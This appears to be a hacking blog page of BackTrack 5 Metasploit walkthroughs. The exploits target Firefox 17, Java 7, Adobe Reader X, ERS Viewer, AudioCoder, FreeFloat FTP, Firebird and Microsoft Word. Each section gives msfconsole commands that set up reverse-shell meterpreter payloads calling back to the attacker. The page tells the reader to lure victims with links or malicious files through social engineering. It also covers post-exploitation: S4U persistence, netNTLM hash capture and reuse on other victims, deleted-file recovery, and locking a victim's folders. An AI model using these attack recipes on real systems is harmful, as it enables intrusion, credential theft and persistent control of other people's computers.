Showing posts with label BackTrack 5 Tutorial. Show all posts
Showing posts with label BackTrack 5 Tutorial. Show all posts

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG "use" element in the (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets
Firefox 17.0.1
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7


Open backtrack terminal type msfconsole


Now type use exploit/multi/browser/firefox_svg_plugin
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)
msf exploit (firefox_svg_plugin)>exploit


Now an URL you should give to your victim http://192.168.1.167:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 


Hack Remote Windows PC Using AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

This module exploits vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing achieving Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.

Exploit Targets
Adobe Reader X 10.1.4
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘ps‘command displays a list of running processes on the target.



Migrate to the AcroRd32 sandboxed process 


Now type use exploit/windows/local/adobe_sandbox_adobecollabsync
msf exploit (adobe_sandbox_adobecollabsync)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_sandbox_adobecollabsync)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (adobe_sandbox_adobecollabsync)>set session 1
msf exploit (adobe_sandbox_adobecollabsync)>exploit


Recover Deleted Data from Remote Victim PC

This module list and try to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Let it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. "pdf") to recover deleted files with that extension. Or set FILES to a comma separated list of IDs (from enumeration) to recover those files. The user must have into account file enumeration and recovery could take a long time, use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open your backtrack terminal and type msfconsole


Run the following command to list all the drives of victim PC

Now type use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit  


Run the following command to recover the deleted data of the Victim PC
(I am using H: drive in my case)

Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive h:
msf exploit (recovery_files)>exploit   


Run the following command to save the deleted data on /root/.msf4/loot
Set files 1073777664,1073778688,1073779212


Exploit Remote PC using ERS Viewer 2011 ERS File Handling Buffer Overflow

This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
ERS Viewer 2011 (v11.04)

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/erdas_er_viewer_bof
msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (erdas_er_viewer_bof)>exploit  


After we successfully generate the malicious ers File, it will stored on your local computer
/root/.msf4/local/msf.ers


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
exploit
Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Windows PC using AudioCoder .M3U Buffer Overflow

This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets
Audio Code 0.8.18

Requirement

Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole



Now type use exploit/windows/fileformat/audio_coder_m3u
msf exploit (audio_coder_m3u)>set payload windows/meterpreter/reverse_tcp
msf exploit (audio_coder_m3u)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (audio_coder_m3u)>exploit


After we successfully generate the malicious m3u File, it will stored on your local computer
/root/.msf4/local/msf.m3u


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Hack Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets
Java 7 Update 17
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_reflection_types
msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (java_jre17_reflection_types)>set target 1
msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local
msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp
machine)
msf exploit (java_jre17_reflection_types)>exploit


Now an URL you should give to your victim http://192.168.1.0.106:8080/Mt7fUKs955I

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.



Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.

Exploit Targets
FreeFloat FTP Server

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/ftp/freefloatftp_user
msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp
msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)
msf exploit (freefloatftp_user)>exploit  


Hack Windows PC using Firebird Relational Database CNCT Group Number Buffer Overflow

This module exploits vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows executing the ROP chain which ultimately is used to execute Virtual Alloc and bypass DE

Exploit Targets
Windows FB 2.5.2.26539 (default)
Windows FB 2.5.1.26351
Windows FB 2.1.5.18496

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/misc/fb_cnct_group
msf exploit (fb_cnct_group)>set payload windows/meterpreter/reverse_tcp
msf exploit (fb_cnct_group)>set lhost 192.168.0.102 (IP of Local Host)
msf exploit (fb_cnct_group)>set rhost 192.168.0.111 (This must be an address on the local machine)
msf exploit (fb_cnct_group)>exploit 

Exploit Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Exploit Targets
Java 7 Update 10
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit 


Now an URL you should give to your victim http://192.168.1.7:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

How to Gather Recent Files Dump of Remote PC

The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open backtrack terminal type msfconsole


Now type use post/windows/gather/dumplinks
msf exploit (dumplinks)>set session 1
msf exploit (dumplinks)>exploit  

Windows Manage User Level Persistent Payload Installer

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight)

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (s4u_persistence)>set session 1 
msf exploit (s4u_persistence)>exploit

Hack netNTLM Credential using Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored net NTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

Exploit Targets
Microsoft Word 2003
Microsoft Word 2007
Microsoft Word 2010

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Now Open backtrack terminal type msfconsole


Now type use auxiliary/docx/word_unc_injector
msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer
/root/.msf4/local/msf.docx


Now use ‘upload ‘command to upload the msf.docx in victim pc using
Upload /root/.msf4/local/msf.docx.


Now  use auxiliary/server/capture/smb
msf exploit (smb)>run


When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can  try to connect to another victim use the same password


How to Lock/Unlock Folder in Remote Victim PC using Metasploit

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.

This will lock your “Movies Folder” folder from D drive



If you want to unlock the folder you may just change the parameters
For unlock Cacls (Folder Name) /e /p everyone:f